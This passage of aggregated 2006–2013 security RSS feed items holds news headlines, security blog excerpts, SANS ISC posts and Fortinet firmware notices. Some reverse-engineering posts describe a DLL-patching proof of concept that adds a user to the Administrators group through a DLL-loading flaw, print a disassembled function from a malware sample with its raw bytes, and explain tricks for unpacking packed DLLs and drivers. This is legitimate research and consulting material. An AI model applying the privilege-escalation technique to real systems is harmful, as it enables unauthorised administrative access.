http://feeds.pheedo.com/tt/1323 The PCI Risk Assessment Special Interest Group concludes that risk assessments are based on a company's unique risk tolerance and environment. Add to digg Add to StumbleUpon Add to del.icio.us Add to Google

==> NASA to deploy whole-disk encryption following breach

http://feeds.pheedo.com/tt/1323 Stolen laptop contained the sensitive data on a large number of employees and contractors. The information was not encrypted. Add to digg Add to StumbleUpon Add to del.icio.us Add to Google

==> Google Says the FBI Is Secretly Spying on Some of Its Customers

http://feeds.wired.com/wired27b Google Says the FBI Is Secretly Spying on Some of Its CustomersThe terrorists apparently would win if Google told you the exact number of times the Federal Bureau of Investigation invoked a secret process to extract data about the media giant's customers. That's why it is

==> FBI Investigating Unidentified Drone Spotted Near JFK Airport

http://feeds.wired.com/wired27b FBI Investigating Unidentified Drone Spotted Near JFK AirportThe Federal Bureau of Investigation said Tuesday it is investigating an unidentified black drone an Alitalia pilot said he encountered while approaching John F. Kennedy International Airport. Whether it was a hobbyist breaking the Federal Aviation Administration's

==> Alleged Drug Dealer at Center of Supreme Court GPS Case Wins Mistrial

http://feeds.wired.com/wired27b Alleged Drug Dealer at Center of Supreme Court GPS Case Wins MistrialThe alleged drug dealer who was at the center of the Supreme Court's landmark GPS tracking case had a mistrial declared Monday in his retrial after District of Columbia jurors said they were hopelessly

==> White House, FCC Chairman Support Legalizing Unlocking of Mobile Phones

http://feeds.wired.com/wired27b White House, FCC Chairman Support Legalizing Unlocking of Mobile PhonesThe President Barack Obama administration said Monday that it made "common sense" for Americans to legally have the power to unlock their mobile phones, so they could use them on a compatible carrier of choice

==> Evernote Hack Exposes User Data, Forces Extensive Password Resets

http://feeds.wired.com/wired27b Evernote Hack Exposes User Data, Forces Extensive Password ResetsEvernote has discovered and blocked suspicious activity on the Evernote network that appears to have been a coordinated attempt to access secure areas of the Evernote Service, according to a statement posted on the

==> Feds Say Man Deserved Arrest Because Jacket Said ‘Occupy Everything’

http://feeds.wired.com/wired27b Feds Say Man Deserved Arrest Because Jacket Said ‘Occupy Everything’A Florida man deserved to be arrested inside the Supreme Court building last year for wearing a jacket painted with "Occupy Everything," and is lucky he was only apprehended on unlawful entry charges, the

==> Cablevision to Suspend Repeat Copyright Scofflaws, Comcast to Hijack Browsers

http://feeds.wired.com/wired27b Cablevision to Suspend Repeat Copyright Scofflaws, Comcast to Hijack BrowsersComcast is to begin hijacking browsers of its internet subscribers who are detected of repeatedly infringing on public file-sharing networks while Cablevision Systems said it would suspend subscribers for 24

==> Bradley Manning Takes ‘Full Responsibility’ for Giving WikiLeaks Huge Government Data Trove

http://feeds.wired.com/wired27b Bradley Manning Takes ‘Full Responsibility’ for Giving WikiLeaks Huge Government Data TroveUpdated 4:08 p.m. FORT MEADE, Md. — Wearing his Army dress uniform, a composed, intense and articulate Pfc. Bradley Manning took “full responsibility” Thursday for providing the anti-secrecy organization WikiLeaks with a trove of classified and sensitive military,

==> Supreme Court Thwarts Challenge to Warrantless Surveillance

http://feeds.wired.com/wired27b Supreme Court Thwarts Challenge to Warrantless SurveillanceThe divided Supreme Court halted Tuesday a legal challenge to a once-secret warrantless surveillance project that gobbles up Americans' electronic communications, a program that Congress eventually legalized in 2008

==> I Totally Owned Your Grandma…

http://hellnbak.wordpress.com/feed/ This was originally written by me and posted here as a guest blog: http://www.zdnet.com/blog/feeds/i-totally-owned-your-grandma-aka-social-networks-as-attack-platforms/2838 ========================================= Guest editorial by Steve Manzuik Lately there has been a lot of attention given to various privacy issues of social networking sites. Whether it is Googles Buzz automatically adding anyone you have ever emailed to your follow list or the [...]

==> Now for Something Completely Different

http://hellnbak.wordpress.com/feed/ Apologies to those who follow this blog just for my security geek content. But this time I am posting something completely different. For the three years I have lived in the bay area I have been partially a San Jose Sharks hockey fan as well as a Calgary Flames fan. I have taken all kinds [...]

==> Backpeddled But Still Very Wrong

http://hellnbak.wordpress.com/feed/ I guess all of the attention that the mindless blog post by eEyecreated has caused them to backpeddlequite a bit. Sadly Morey is still way off the mark and if anything just made it more clear that he is attempting to use this as a reason you should buy their product and not use the [...]

==> How The Mighty Have Fallen

http://hellnbak.wordpress.com/feed/ Full Disclosure: I am a former eEye employee and managed their now pretty much dead Research Department. Something of which, after reading this post, I can honestly say I am embarrassed to admit. This is a classic case of the insane taking over the asylum. This morning a friend of mine pointed out this blog [...]

==> Apparently Time Has Reversed – Not The Disclosure Debate Again?!?

http://hellnbak.wordpress.com/feed/ Remember back in 2001 when researchers were compared to Terrorists and the term “Information Anarchy” was coined? You can read this blast from the past here –> http://www.windowsitpro.com/article/windows-client/information-anarchy-the-blame-game-.aspx As the saying goes, those who do not learn from history are doomed to repeat it, or something like that we have this clueless blog post over [...]

==> Murder – Just Like In The Video Games

http://hellnbak.wordpress.com/feed/ By now I am sure most of you have seen the “Collateral Murder” video that was released via Wikileaks. I do not want to get involved with the arm chair debates over what should or should not have happened. I have no real military experience to speak of unless being chased off a Canadian base [...]

==> Creepy GMail “Feature”

http://hellnbak.wordpress.com/feed/ I stumbled upon this creepy GMail “feature” the other day. Basically, it appears that there is some logic that notices when you type the phrase “see the attached” and then checks for a file attachment alerting you if you fail to attach a file. With all the privacy concerns around GMail I found this to [...]

==> Nexus-1 Honeymoon is Over

http://hellnbak.wordpress.com/feed/ As many of my friends know. I am very hard on my electronics. My laptops, my MP3 players, my cell phones and even the TV remote all get abused in various ways. So, in typical bleep fashion, over the weekend I dropped my Nexus-1 phone and sadly, even thoughit wasn’t a far fall -a couple [...]

==> Clueless FUD Article…

http://hellnbak.wordpress.com/feed/ I haven’t blogged anything of good use lately so I thought I would start upagain by calling out this completelyuseless and incorrect opinion piece. On the Dark Reading blog an article appeared entitled; “Share –Or Keep Getting Pwned” Sigh. Clearly zero research was done in to this posting as there really is a lot of [...]

==> Week 9 in Review – 2013

http://infosecevents.net/feed/ Event Related Juniper Networks intros global cloud-based ‘attacker database’ – zdnet.com At the start of RSA 2013, Juniper Networks is rolling out a global database to track attacks on individual devices. MASTIFF Analysis of APT1 – novainfosec.com At Shmoocon this year we were please to find that there is a project focused on this specifically [...]

==> Information Security Events For March

http://infosecevents.net/feed/ Here are information security events in North America this month: Metricon (Conjunction with RSA) : March 1, 2013 in San Francisco USA BSides Vancouver 2013 : March 4 to 5 in Vancouver, BC, Canada CanSecWest 2013 : March 6 to 8 in Vancouver, British Columbia AtlSecCon 2013 : March [...]

==> Week 8 in Review – 2013

http://infosecevents.net/feed/ Event Related ShmooCon Firetalks 2013 – irongeek.com These are the videos I have for the ShmooCon Firetalks 2013. Resources APT 1 APT 1: Exposing One of China’s Cyber Espionage Units – intelreport.mandiant.com APT1: Exposing One of China’s Cyber Espionage Units Threat Actors Using Mandiant APT1 Report as a Spear Phishing Lure: The Nitty Gritty – [...]

==> Week 7 in Review – 2013

http://infosecevents.net/feed/ Event Related S4x13 Video: Atlas on RF Comms Security and Insecurity – digitalbond.com RF Comms are often ignored in SCADA assessments. Big mistake as atlas 0f d00m shows RF hacking session at S4x13. #Shmoocon Presentation Links – mainframed767.tumblr.com So I talked fast and furious and ran out of time, but 20 minutes is not a [...]

==> Week 6 in Review – 2013

http://infosecevents.net/feed/ Resources “Security Engineering” now available free online – lightbluetouchpaper.org Im delighted to announce that my book Security Engineering A Guide to Building Dependable Distributed Systems is now available free online in its entirety. You may download any or all of the chapters from the books web page. The Anatomy of Unsecure Configuration: Reality Bites [...]

==> Week 5 in Review – 2013

http://infosecevents.net/feed/ Event Related Pentest & Reverse: iOS Application Hacking – esec-pentest.sogeti.com Last month, we gave some lectures about iOS application Hacking first at GreHack (Grenoble, France) and then at Hack.Lu (Luxembourg, Luxembourg). Here you will find the slides and the paper. Don’t hesitate to send us your questions. Resources The Red team Mindset Course Part 1 [...]

==> Information Security Events For February

http://infosecevents.net/feed/ Here are information security events in North America this month: ShmooCon 2013 : February 15 to 17 in Washington, District of Columbia USA ACM Conference on Data and Application Security and Privacy (CODASPY) : February 18 to 20 in San Antonio, TX, USA BSides Boston : February 23 in Cambridge, MA [...]

==> Week 4 in Review – 2013

http://infosecevents.net/feed/ Event Related University Courses on Reverse Engineering and Malware Analysis – f-secure.com Today marks the commencement of the first lecture for our spring 2013 semester Reverse Engineering Malware course for the Aalto University (Espoo campus) in Finland. Resources Security Assessment of Blackberry Applications – resources.infosecinstitute.com Development of mobile applications have picked up really fast in [...]

==> Week 3 in Review – 2013

http://infosecevents.net/feed/ Event Related Offensive Defense – blog.ioactive.com I presented before the holiday break at Seattle B-Sides on a topic I called “Offensive Defense.” This blog will summarize the talk. I feel it’s relevant to share due to the recent discussions on desktop antivirus software (AV) [1], [2],[4], [3] Resources Red October The “Red October” Campaign – [...]

==> Week 2 in Review – 2013

http://infosecevents.net/feed/ Event Related Index of Congress 29c3 – ftp.ccc.de High quality mp4 of 29c3. The ‘Hack Back’ Offense – bankinfosecurity.com To repel the onslaught of cyberattacks against organizations, security leaders are debating the merits of the “hack back” defense. THREADS – trailofbits.com THREADS is an annual conference that focuses on pragmatic security research and new discoveries [...]

==> The blog has moved…

http://infosecramblings.wordpress.com/feed/ After much thought and consideration, I decided to move my blog from wordpress.com to my own domain. The decision has nothing to do with the service provided by wordpress.com. I have never had any problems with this blog while it has been hosted by wordpress.com. There are other things I want to do with the [...]

==> Interesting Information Security Bits for 11/07/2008

http://infosecramblings.wordpress.com/feed/ Good afternoon everybody! I hope your day is going well. Here are today’s Interesting Information Security Bits from around the web. Virtualization: How to Isolate Application Traffic Lori has penned a nice article pointing out how we can use VLANs to isolate application traffic. She makes and excellent point in the article, “we’ve grown to [...]

==> Interesting Information Security Bits for 11/06/2008

http://infosecramblings.wordpress.com/feed/ Good afternoon everybody! I hope your day is going well. Here are today’s Interesting Information Security Bits from around the web. TaoSecurity: Defining Security Event Correlation Richard has a good post up on defining security event correlation. Go check it out. Why use Firefox << Techdulla Techdulla tells us why he uses Firefox for his [...]

==> Interesting Information Security Bits for 11/05/2008

http://infosecramblings.wordpress.com/feed/ Good afternoon everybody! I hope your day is going well. Here are today’s Interesting Information Security Bits from around the web. CSI Stick – So who has a copy of your phone? << SANS Computer Forensics, Investigation, and Response This is both very cool and very scary. Tool that allows you to quickly and easily [...]

==> Interesting Information Security Bits for 11/04/2008

http://infosecramblings.wordpress.com/feed/ Good afternoon everybody! I hope your day is going well. Here are today’s Interesting Information Security Bits from around the web. /dev/random >> Blog Archive >> Critical dns2tcp Vulnerability! Looks like dns2tcp has a vulnerability that needs to be taken care of. Time to upgrade. TrueCrypt – Free Open-Source On-The-Fly Disk Encryption Software for Windows [...]

==> Resources to increase your info security knowledge and benefit your infosec career…

http://infosecramblings.wordpress.com/feed/ @GeekGrrl posted a note on her blog asking this question: 1) How would you recommend getting started on a career toward Network Security/Network Pen Tester? She has some follow-up questions to that first one requesting some specific information. Go read her post and then come back. . . . . Okay, here is what I [...]

==> Who needs employee exit procedures and disaster recovery plans are for whimps…

http://infosecramblings.wordpress.com/feed/ This article talks about the conviction of Pryavrat Patel for actions he took after his long-term contract employment with Pratt-Read was terminated. Now, what Mr. Patel did was definitely wrong, but frankly, Pratt-Read should probably put some thought into how they dealt with the situation too. It took them two weeks to recover from the [...]

==> Recap: RSA Europe 2008 Day 2

http://infosecramblings.wordpress.com/feed/ Hello again. Day 2 of RSA Europe 2008 was a busy one. I attended several sessions during the day and then the Security Catalyst, Security Bloggers, Security Twits get together happened that evening. This post will only talk about the day. The meet-up post will be later. Without further ado, let’s get to it. ‘The [...]

==> Recap: RSA Europe 2008 Day 1

http://infosecramblings.wordpress.com/feed/ Hi there folks. I am home and somewhat rested from my trip to London for the RSA Europe 2008 conference. It was a great trip and i enjoyed the conference. Below is a recap of my first day. This is going to be long, so hang in there Information Security: From Ineffective to Innovative Arthur [...]

==> March 2013 OUCH! - Social Networking Safely http://www.securingthehuman.org/resources/newsletters/ouch/2013#march2013, (Wed, Mar 6th)

http://isc.sans.org/rssfeed_full.xml Post suggestions or comments in the section below or send us any questions or comments in the contact form on https://isc.sans.edu/contact.html#contact-form -- Adam Swanger, Web Developer (GWEB, GWAPT) Internet Storm Center https://isc.sans.edu (c) SANS Internet Storm Center. http://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

==> ISC StormCast for Wednesday, March 6th 2013 http://isc.sans.edu/podcastdetail.html?id=3166, (Wed, Mar 6th)

http://isc.sans.org/rssfeed_full.xml (c) SANS Internet Storm Center. http://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

==> IPv6 Focus Month: Device Defaults, (Tue, Mar 5th)

http://isc.sans.org/rssfeed_full.xml IPv6 in this part of the planet is not very advanced, as in the deployment isnt. Whilst companies and telcos realise that the end so to speak is nigh for IPv4 uptake is rather slow in AU at least. Telcos are however quickly addressing this and no doubt a number of them are close to enabling IPv6 to your gateway. If they havent already. This brings be to my favourite devices, firewalls. During a bunch of security reviews over the last year or so we typically spend a little bit of time looking at the IPv6 setups and requirements in the organisations. We certainly found that people quite readily state they have no IPv6 in their environment, however often when they RDP, SSH or otherwise connect to a more recent version of insert your favourite OS here, the connection is most definately IPv6. When you then look at firewall configurations you often find nice looking IPv4 rules to control traffic and a less than ideal default for IPv6 ANY, ANY, ANY permit. So does that mean when your telco enables IPv6 to your gateway, traffic can leave? Potentially yes, it does depend on a number of other factors, but the core of it is that people do not realise they may be leaking. Even if traffic to the internet is restricted, what about other network segments? In a PCI DSS pentest, connectivity via IPv4, nope, nicely segmented. IPv6 please come through, full access. Another thing to remember with firewalls is that IPv6 is relatively new to them as well. So maybe you need to check out whether your product does support IPv6 and if the answer is yes, to what extent. What about other devices in the network, your switches and routers. will their current or even latest OS support you IPv6 requirements. Printers, Multifunction devices etc, do they support it. Do they have defaults that really do not help you out from a security perspective. For today that is what I would like to hear from you. What devices have you come across that have interesting IPv6 defaults. Maybe they dont support it fully. Maybe they just get it wrong. One firewall a few years ago (fixed now) did IPv6 to IPv4 translation a bit diferrently and mangled the IPv4 packets that resulted. So what are your IPv6 watch out for this tips? Mark (c) SANS Internet Storm Center. http://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

==> ISC StormCast for Tuesday, March 5th 2013 http://isc.sans.edu/podcastdetail.html?id=3163, (Tue, Mar 5th)

http://isc.sans.org/rssfeed_full.xml (c) SANS Internet Storm Center. http://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

==> Java j6u43 update #YAJU http://www.oracle.com/technetwork/java/javase/6u43-relnotes-1915290.html, (Tue, Mar 5th)

http://isc.sans.org/rssfeed_full.xml Richard Porter --- ISC Handler on Duty (c) SANS Internet Storm Center. http://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

==> Google Chrome Stable Channel Update v2501364152 http://googlechromereleases.blogspot.com/2013/03/stable-channel-update_4.html, (Mon, Mar 4th)

http://isc.sans.org/rssfeed_full.xml Richard Porter --- ISC Handler on Duty (c) SANS Internet Storm Center. http://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

==> Java 7u17 update #YAJU http://www.oracle.com/technetwork/java/javase/7u17-relnotes-1915289.html, (Mon, Mar 4th)

http://isc.sans.org/rssfeed_full.xml Richard Porter --- ISC Handler on Duty (c) SANS Internet Storm Center. http://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

==> Elevation of Privilege DLL Patcher

http://malwareanalysis.com/CommunityServer/blogs/geffner/rss.aspx In the course of security consulting, I often find myself in a situation where I've identified a security vulnerability but I need to create a proof-of-concept to show the feasibility of the vulnerability's exploitability. Recently, I found an elevation-of-privilege vulnerability in which an application that runs as a privileged user loads a DLL from a location that is writeable by an unprivileged attacker. An unprivileged attacker could write a malicious DLL to this location, and when loaded by the given application, the DLL's code would execute in the context of a privileged user. Ideally, we'd like the "malicious" DLL to have all the functionality of the DLL that the application expected to load, including the same exported functions. In other words, what I really wanted was an easy way to patch an existing DLL to inject my "malicious" code to run before the DLL's original DllMain code was executed, after which the original DllMain code would be called and the DLL would continue to operate as normal. Unfortunately, I know of no programs like this that patch DLLs on disk, so I made my own. The program attached to this blog post redirects a given DLL's entrypoint (which originally pointed to DllMain) to point to code that has been patched in to the DLL. This patched in code will add a given user to the Administrators group in Windows (assuming that it's being run in the context of a privileged user), after which it will transfer control back to the DLL's original DllMain. The patcher also updates the Import Table for the DLL since the patched in code relies on the function NetLocalGroupAddMembers(...) from netapi32.dll. The only other side effect of the patcher is that it clears the Bound Imports for the DLL; the only adverse side effect of this is that this may cause the DLL to take a few extra milliseconds to load. The patcher is compatible with both 32-bit and 64-bit DLLs. You can run the patcher executable without command line arguments for usage instructions. This is version 1.0, so please e-mail me if you

==> Counting Lines of Source Code

http://malwareanalysis.com/CommunityServer/blogs/geffner/rss.aspx I'm reviewing the source code for a rather large project this week and I wanted to update my Facebook status by saying something like, "Jason is reviewing 100,000 lines of Java for security vulnerabilities." However, being the perfectionist that I am I wanted to give the real number of lines of code. I wasn't aware of any built-in functionality in Visual Studio to do this, and after three minutes of Googling, I found a lot of Visual Studio plugins that could do this but unfortunately I didn't find any instructions on how to do this with just plain Visual Studio. And honestly, I didn't want to install a plugin (see http://blogs.msdn.com/oldnewthing/archive/2006/03/22/558007.aspx :) I figured I could whip up a short C# program to do this, but even that seemed a little over-kill for such a simple task. Then I realized I could do this from a standard console window command prompt: cmd /v:on set lines = 0 for /r %a in (*.java) do (find /v /c "" "%a" > %temp%\temp.txt for /f "tokens=6" %b in (%temp%\temp.txt) do (set /a lines += %b)) echo %lines% The "tokens=6" part is specific to the source code directory structure for this particular project, and if any of the source code subdirectories contained spaces, you'd have to tweak the code above a little. But hey, it worked out quite nicely, and it was a much cleaner solution than installing a plugin. And I'm sure there's an even shorter/simpler way to do this from a standard command prompt than with what I have above. Feel free to post cleaner "solutions" :) (BTW, the actual number of lines turned out to be 348,523... that should keep me busy for a while.)

==> Investigating Outlook's Single-Instance Restriction (PART 2)

http://malwareanalysis.com/CommunityServer/blogs/geffner/rss.aspx Please see PART 1. While the return value of FindWindowA is used to determine whether or not Outlook terminates its process, there's another issues when it comes to using a separate profile. Outlook calls MAPILogonEx without the MAPI_NEW_SESSION bit set. This causes Outlook to try to use an existing MAPI session if it can find one. Because of this, Outlook doesn't present the user with the option to choose a different profile in the second instance of Outlook; it will instead just use the profile that the first instance is using. (Why I didn't hit this issue in PART 1 is not clear.) As such, to fully overcome Outlook's single-instance limitation, it is necessary to spoof the return value of the FindWindowA call in PART 1 and to set the MAPI_NEW_SESSION bit in the flFlags argument passed to MAPILogonEx.

==> Loading Drivers in OllyDbg

http://malwareanalysis.com/CommunityServer/blogs/geffner/rss.aspx In a previous post, I talked about changing the Subsystem field in the IMAGE_OPTIONAL_HEADER to trick OllyDbg into loading a driver for the purpose of unpacking. However, making this single change is often not enough to be able to load the driver as an EXE in OllyDbg. From my experience (in other words, I haven't verified this in the Windows source code and I'm not speaking authoritatively here), executable files need to have NTDLL.DLL in their Import Table or have another DLL in their Import Table that will eventually cause NTDLL.DLL to get loaded. I was looking at a driver today that only had NTOSKRNL.EXE and HAL.DLL in its Import Table. The former causes BOOTVID.DLL and KDCOM.DLL to get loaded as well, however nowhere in the import chain does NTDLL.DLL get loaded. Because of this, OllyDbg can't get the driver up and running after we make the Subsystem change. To solve this problem, we can add NTDLL.DLL (or anything that imports NTDLL.DLL, like KERNEL32.DLL) to the Import Table of the driver and OllyDbg will then be able to load the driver as a new process.

==> Function Analysis

http://malwareanalysis.com/CommunityServer/blogs/geffner/rss.aspx While analyzing a malware sample today, I came across an interesting function. It uses red-herring local variables and red-herring global variables, and even once you get rid of that code, it's still unclear as to what the function does. Since you don't have access to the callers of this function, I'll tell you this: * The first argument is a null-terminated ASCII string. * The second argument is a null-terminated ASCII string. * The third argument is an integer. Your challenge? Tell me what the function does. Your prize? You get to choose the name of the next malware family that I name. Stipulations: * Cannot refer to the name of a person, place, or time. * Cannot refer to anything obscene or offensive. * Cannot be found in a dictionary or web-search. * Cannot use bleep-casing for compounding words -- must begin with one uppercase letter and end with all lowercase letters. * Must be a "generic" name (for example, shouldn't contain the word "bot" or "worm", since I have no idea what class of malware I'll end up naming next). * Must be humanly pronouncable. * Must be between four and eight letters in length. * I have final discretion over the name in case you think of something "bad" that isn't covered by one of the rules above. The winner is the first person to post a comment that correctly and fully describes in high-level English (not in code) what the function does. And to in case you think I'm "hiring cheap labor" to analyze this for me, I'll pull a Raymond Chen and say that the MD5 of my analysis is F2F3648B9BE371B4682B728A7A3D920F. Once the correct answer is posted, I'll post my analysis which hashes to that MD5. Here's the function: sub_0 proc near var_10 = dword ptr -10h var_C = dword ptr -0Ch var_8 = dword ptr -8 var_4 = dword ptr -4 arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch arg_8 = dword ptr 10h push ebp mov ebp, esp sub esp, 10h push ebx push esi push edi mov esi, [ebp+ arg_4 ] mov [ebp+ var_8 ], 697A259Dh xor [ebp+ var_8 ], 182Ch inc dword ptr ds: 42C094h and [ebp+ var_C ], 0 and [ebp+ var_4 ], 0 jmp short loc_94 ; ----------------------------------------------------------------------- loc_2A: ; CODE XREF: sub_0+A6j xor ebx, ebx add [ebp+ var_8 ], 3AA5h inc dword ptr ds: 42C094h xor edi, edi jmp short loc_81 ; ----------------------------------------------------------------------- loc_3D: ; CODE XREF: sub_0+8Fj mov eax, [ebp+ var_4 ] add eax, edi mov edx, [ebp+ arg_0 ] movsx eax, byte ptr [edx+eax] movsx edx, byte ptr [esi+edi] cmp eax, edx jnz short loc_52 inc ebx loc_52: ; CODE XREF: sub_0+4Fj mov ecx, esi or eax, 0FFFFFFFFh loc_57: ; CODE XREF: sub_0+5Cj inc eax cmp byte ptr [ecx+eax], 0 jnz short loc_57 cmp ebx, eax jnz short loc_72 inc [ebp+ var_C ] mov eax, [ebp+ arg_8 ] cmp [ebp+ var_C ], eax jnz short loc_72 mov eax, [ebp+ var_4 ] jmp short loc_C0 ; ----------------------------------------------------------------------- loc_72: ; CODE XREF: sub_0+60j ; sub_0+6Bj mov eax, 43C9h mul [ebp+ var_8 ] mov [ebp+ var_10 ], eax mov [ebp+ var_8 ], eax inc edi loc_81: ; CODE XREF: sub_0+3Bj mov ecx, esi or eax, 0FFFFFFFFh loc_86: ; CODE XREF: sub_0+8Bj inc eax cmp byte ptr [ecx+eax], 0 jnz short loc_86 cmp edi, eax jb short loc_3D inc [ebp+ var_4 ] loc_94: ; CODE XREF: sub_0+28j mov eax, [ebp+ arg_0 ] mov ecx, eax or eax, 0FFFFFFFFh loc_9C: ; CODE XREF: sub_0+A1j inc eax cmp byte ptr [ecx+eax], 0 jnz short loc_9C cmp [ebp+ var_4 ], eax jb short loc_2A mov eax, 0FFFFh jmp short loc_C0 ; ----------------------------------------------------------------------- mov eax, 514Ah mul dword ptr [ebp- 8 ] mov [ebp- 10h ], eax mov eax, [ebp- 10h ] mov [ebp- 8 ], eax loc_C0: ; CODE XREF: sub_0+70j ; sub_0+ADj pop edi pop esi pop ebx leave retn sub_0 endp And here's the raw byte-code for the function above: 5589E583EC105356578B750CC745F89D257A698175F82C180000FF0594C04200 8365F4008365FC00EB6A31DB8145F8A53A0000FF0594C0420031FFEB448B45FC 01F88B55080FBE04020FBE143E39D075014389F183C8FF40803C010075F939C3 7510FF45F48B45103945F475058B45FCEB4EB8C9430000F765F88945F08945F8 4789F183C8FF40803C010075F939C772ACFF45FC8B450889C183C8FF40803C01 0075F93945FC7282B8FFFF0000EB11B84A510000F765F88945F08B45F08945F8 5F5E5BC9C3

==> Virus Bulletin 2006

http://malwareanalysis.com/CommunityServer/blogs/geffner/rss.aspx I bought my plane ticket a few hours ago for Virus Bulletin 2006. I'm looking forward to rubbing elbows with other virus analysts and discussing the latest and greatest reverse engineering tools and methods. If you're going to VB'06 as well, send me an e-mail or find me in person and mention my blog and I'll buy you a beer (which shouldn't be too hard seeing as how the conference will be in Montreal)!

==> Unpacking DLLs and Drivers with OllyDbg

http://malwareanalysis.com/CommunityServer/blogs/geffner/rss.aspx People often ask me how to unpack DLLs and drivers. A common assumption is that it is necessary to use OllyDbg's LOADDLL for unpacking DLLs and that a ring-0 debugger such as SoftICE or WinDbg is necessary for unpacking drivers. With a little tweaking, we can use regular OllyDbg to unpack packed DLLs and even many packed drivers. I don't know about you, but I've always had problems with LOADDLL. Even though it's well documented in OllyDbg's help file (the source is even included in the help file), I'd rather not use it if I don't have to. So how can we load a DLL into OllyDbg so that we can unpack it like we would a normal EXE? All that you need to do is set the IMAGE_FILE_DLL bit to zero in the Characteristics field of the PE's IMAGE_FILE_HEADER structure. You could use a hex editor to make this change, but it's easier with a PE editor like LordPE. Once this flag is zeroed out, you can load the "DLL" into OllyDbg and OllyDbg and the OS will interpret it as an EXE. You can then unpack it as you would an EXE (trace to the OEP, dump, fix the imports, etc.), and then set the IMAGE_FILE_DLL bit back to one in the unpacked file. The only catch is that many unpacking stubs check to see if [EBP+0x0C] == 1 (does the fdwReason argument to DllMain equal DLL_PROCESS_ATTACH), and if it doesn't equal 1 then it won't continue to unpack itself. You can fix this problem by looking for this comparison and forcing a jump/no-jump or by manually pushing three DWORDs onto the stack (before executing the first instruction at the EP), the second of which should be 1. We can use the same PE header patching trick for loading drivers into OllyDbg for unpacking purposes. By setting the Subsystem field to 2 (IMAGE_SUBSYSTEM_WINDOWS_GUI) in the PE's IMAGE_OPTIONAL_HEADER, OllyDbg and the OS will interpret the file as an EXE instead of as a driver. This allows us to trace through the unpacking stub until the code and data are unpacked, and we can dump the process when we find the OEP. Of course if the unpacking stub is trying to execute instructions/functions that need to be executed from ring-0 then we won't be able to unpack it like this. However, if the unpacking stub is just doing a lot of simple XORing to unpack the original code and data, then we should be able to use this trick to successfully unpack the driver with OllyDbg.

==> FortiAuthenticator 2.1.0

http://pub.kb.fortinet.com/rss/firmware.xml FortiAuthenticator 2.1.0 B0065 and release notes are available for download from the Support site : https://support.fortinet.com This concerns the following models: * FAC_200D, FAC_400C, FAC_1000C, * FAC_3000B, FAC_VM

==> FortiRecorder 1.2.0

http://pub.kb.fortinet.com/rss/firmware.xml FortiRecorder 1.2.0 B0155 and release notes are available for download from the Support site : https://support.fortinet.com This concerns the following models: * FRC_200D

==> FortiAuthenticator 2.1.0

http://pub.kb.fortinet.com/rss/firmware.xml FortiAuthenticator 2.1.0 B0065 and release notes are available for download from the Support site : https://support.fortinet.com This concerns the following models: * FAC_200D, FAC_400C, FAC_1000C, * FAC_3000B, FAC_VM

==> FortiMail 5.0.0

http://pub.kb.fortinet.com/rss/firmware.xml FortiMail 5.0.0 B0107 and release notes are available for download from the Support site : https://support.fortinet.com This concerns the following models: * FE_100C, FE_2000A, FE_2000B, * FE_200D, FE_3000C, FE_3000D, * FE_4000, FE_400B, FE_400C, * FE_5001A, FE_5002B, FE_VM,

==> FortiOS 4.3.12

http://pub.kb.fortinet.com/rss/firmware.xml FortiOS 4.3.12 B0656 and release notes are available for download from the Support site : https://support.fortinet.com This concerns the following models: * FGT_VM64_XEN

==> FortiOS 4.2.15

http://pub.kb.fortinet.com/rss/firmware.xml FortiOS 4.2.15 B0356 and release notes are available for download from the Support site : https://support.fortinet.com This concerns the following models: * FGT_30B, FK_3810A, FK_5001A, * FGT_50B, FGT_51B, FGT_60B, * FGT_80C, FGT_80CM, FGT_82C, * FGT_100A, FGT_200A, FGT_110C, * FGT_111C, FGT_200B, FGT_224B, * FGT_300A, FGT_310B, FGT_310B_DC, * FGT_311B, FGT_400A, FGT_500A, * FGT_620B, FGT_620B_DC, FGT_800, * FGT_800F, FGT_1000A, FGT_1000AFA2, * FGT_1000A_LENC, FGT_3016B, FGT_3600A, * FGT_3810A, FGT_5001, FGT_5001A, * FGT_5001FA2, FGT_5005FA2, FOC_3810A, * FOC_5001, FOC_5001A, FOC_5001FA2, * FOC_5005FA2, FWF_30B, FWF_50B, * FWF_60B, FWF_80CM, FWF_81CM, * FGT_1240B, FGT_3600, FGT_200B_POE, * FGT_ONE, FGT_60C, FGT_3950B, * FGT_3951B, FGT_3040B, FGT_621B, * FK_3950B, FK_3951B, FWF_60C, * FGT_VM, FGT_621B_DC, FGT_5001B, * FGT_3140B, FWF_60CM, FK_5001B, * FWF_60CX_A, FGT_3950B_LENC, FGT_200B_LENC, * FGT_300C

==> FortiManager 4.3.7

http://pub.kb.fortinet.com/rss/firmware.xml FortiManager 4.3.7 B0700 and release notes are available for download from the Support site : https://support.fortinet.com This concerns the following models: * FMG_100, FMG_100C, FMG_400A, * FMG_400B, FMG_1000C, FMG_3000, * FMG_3000B, FMG_3000C, FMG_5001A, * FMG_VM32, FMG_400C, FMG_VM64, * FMG_200D

==> FortiCache 2.2.1

http://pub.kb.fortinet.com/rss/firmware.xml FortiCache 2.2.1 B0225 and release notes are available for download from the Support site : https://support.fortinet.com This concerns the following models: * FCH1KC, FCH3KC, FCH4HC,

==> FortiDNS 1.2.0

http://pub.kb.fortinet.com/rss/firmware.xml FortiDNS 1.2.0 B#### and release notes are available for download from the Support site : https://support.fortinet.com This concerns the following models: * FNS_400C, FNS_1000C, FNS_VM,

==> FortiDDoS 3.1.5

http://pub.kb.fortinet.com/rss/firmware.xml FortiDDoS 3.1.5 B7 and release notes are available for download from the Support site : https://support.fortinet.com This concerns the following models: * FDD_100A, FDD_200A, FDD_300A,

==> FortiOS 5.0.1

http://pub.kb.fortinet.com/rss/firmware.xml FortiOS 5.0.1 B0147 and release notes are available for download from the Support site : https://support.fortinet.com This concerns the following models: * FGT_60D, FWF_60D

==> FortiWeb 4.4.6

